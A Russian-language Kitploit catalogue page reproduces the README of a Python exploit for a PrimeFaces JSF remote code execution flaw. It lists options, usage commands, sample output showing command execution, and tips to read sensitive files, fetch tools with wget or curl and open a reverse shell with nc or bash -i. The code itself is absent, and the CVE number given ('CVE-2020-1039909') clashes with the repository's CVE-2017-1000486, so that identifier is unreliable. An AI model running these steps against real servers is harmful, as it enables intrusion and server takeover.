Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-1000486 — Python-эксплойт для CVE-2020-1039909, уязвимости удалённого выполнения кода в Primefaces JSF. Выполняет произвольные команды через атаку padding oracle, с опциями для прокси, cookies и режима POC. | Kitploit
Инструменты/GitHubGitHub/byt3l0rd/cve-2017-1000486
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКриптографияТестирование на ПроникновениеRed Teaming
GitHubbyt3l0rd/cve-2017-1000486

CVE-2017-1000486

Python-эксплойт для CVE-2020-1039909, уязвимости удалённого выполнения кода в Primefaces JSF. Выполняет произвольные команды через атаку padding oracle, с опциями для прокси, cookies и режима POC.

Репозиторий
11 ч 18 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

README - CVE-2020-1039909 Primefaces Remote Code Execution

============================================================

ОБ УЯЗВИМОСТИ

CVE-2020-1039909 — это уязвимость удалённого выполнения кода (RCE) в фреймворке Primefaces JSF. Ошибка позволяет атакующему выполнять произвольные команды на сервере через атаку Padding Oracle, из-за использования слабого шифрования и пароля по умолчанию.

Затронутые версии:

  • Primefaces ранее 5.2.21
  • Primefaces 5.3.x ранее 5.3.8
  • Primefaces 6.x ранее 6.0

Воздействие:

  • Удалённое выполнение кода (RCE)
  • Полная компрометация сервера
  • Доступ к операционной системе
  • Возможная установка бэкдоров

============================================================

ПРЕДВАРИТЕЛЬНЫЕ ТРЕБОВАНИЯ

  • Цель, работающая на уязвимом Primefaces
  • Python 3.6+
  • Библиотеки: requests, pycryptodome, paddingoracle

Установка зависимостей:

pip install requests pycryptodome paddingoracle

============================================================

ДОСТУПНЫЕ КОМАНДЫ

Основные параметры:

target URL цели (например: http://target.com) -pw, --password Пароль Primefaces (по умолчанию: primefaces) -pt, --path Путь к dynamiccontent.properties (по умолчанию: /javax.faces.resource/dynamiccontent.properties.xhtml) -c, --cmd Команда для выполнения (по умолчанию: whoami) -poc, --poc Использовать тестовый payload (только проверка уязвимости) -px, --proxy Настроить прокси (например: http://127.0.0.1:8080) -ck, --cookie Настроить cookie -o, --oracle Включить атаку Padding Oracle (1 = включено, 0 = выключено) (ПО УМОЛЧАНИЮ: 0) (МЕДЛЕННО) -pl, --payload Зашифрованный EL payload (для использования с Padding Oracle)

============================================================

ПРИМЕРЫ ИСПОЛЬЗОВАНИЯ

  1. Выполнить базовую команду (whoami)

python3 exploit.py http://target.com

  • Выполнить конкретную команду
  • python3 exploit.py http://target.com -c "id"

    1. Проверить, уязвима ли цель (режим POC)

    python3 exploit.py http://target.com --poc

    1. Использовать прокси (Burp Suite)

    python3 exploit.py http://target.com -px http://127.0.0.1:8080

    1. Использовать с cookie

    python3 exploit.py http://target.com -ck "JSESSIONID=xxx"

    1. Использовать Padding Oracle (медленнее, но эффективнее)

    python3 exploit.py http://target.com -o 1 -c "whoami"

    1. Использовать ранее сгенерированный payload

    python3 exploit.py http://target.com -pl "payload_criptografado"

    ============================================================

    ПРИМЕР ВЫВОДА

    $ python3 exploit.py http://target.com -c "id"

    [] Generated Encrypted Payload: xyz123... [] Attempting to execute: id

    POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 ...

    HTTP/1.1 200 OK ...

    [+] Exploit Result:

    HTTP/1.1 200 OK ...

    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    ============================================================

    РЕЖИМ POC (ТЕСТ НА УЯЗВИМОСТЬ)

    Режим POC только проверяет, уязвима ли цель, без выполнения опасных команд:

    python3 exploit.py http://target.com --poc

    Ожидаемый вывод, если уязвима:

    [+] BANG!!! :D - Target IS VULNERABLE!!!

    Вывод, если не уязвима:

    [-] Target Probably NOT VULNERABLE :-(

    ============================================================

    PADDING ORACLE (МЕДЛЕННЫЙ РЕЖИМ)

    Если стандартная атака не сработала (пустое тело ответа), попробуйте режим Padding Oracle. Этот режим медленнее, но эффективнее:

    python3 exploit.py http://target.com -o 1 -c "whoami"

    ============================================================

    ПРОКСИ И ОТЛАДКА

    Для анализа запросов с помощью Burp Suite:

    python3 exploit.py http://target.com -px http://127.0.0.1:8080

    ============================================================

    ЧАСТЫЕ ОШИБКИ И РЕШЕНИЯ

    "Response body empty... Target might not be vulnerable" Попробуйте режим Padding Oracle: -o 1

    "Target Probably NOT VULNERABLE" Цель может быть пропатчена или не использует пароль по умолчанию

    "Connection refused" Проверьте, доступна ли цель

    "SSL Error" Используйте http вместо https или игнорируйте сертификаты

    ============================================================

    СОВЕТЫ ПО ЭКСПЛУАТАЦИИ

    • Тестируйте различные команды для исследования системы
    • Используйте whoami для определения текущего пользователя
    • Используйте id для просмотра прав
    • Используйте ls для перечисления файлов
    • Используйте cat для чтения чувствительных файлов
    • Используйте wget или curl для загрузки дополнительных инструментов
    • Используйте nc или bash -i для получения обратной оболочки

    ============================================================

    ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

    Данное программное обеспечение предоставляется в образовательных целях и для тестирования. Автор не несёт ответственности за любой ущерб, убытки или последствия, возникшие в результате неправомерного использования данного инструмента.

    Пользователь несёт единоличную ответственность за свои действия. Использование данного эксплойта на системах без авторизации незаконно и может привести к гражданским и уголовным наказаниям.

    Используйте ответственно и этично. Знания предназначены для распространения, но мудрость заключается в понимании того, как и когда их применять.

    ============================================================

    МИТИГАЦИЯ (ДЛЯ АДМИНИСТРАТОРОВ)

    1. Обновите Primefaces до последней версии
    2. Измените пароль Primefaces по умолчанию
    3. Используйте HTTPS для шифрования коммуникаций
    4. Внедрите WAF для блокировки вредоносных payload
    5. Отключите функцию dynamiccontent.properties, если она не требуется

    ============================================================

    ССЫЛКИ

    • CVE-2020-1039909: https://nvd.nist.gov/vuln/detail/CVE-2020-1039909
    • Primefaces Security Advisory
    • Padding Oracle Attack (CVE-2017-1000486)

    ============================================================

    Developed by byt3l0rd

    Скачать инструмент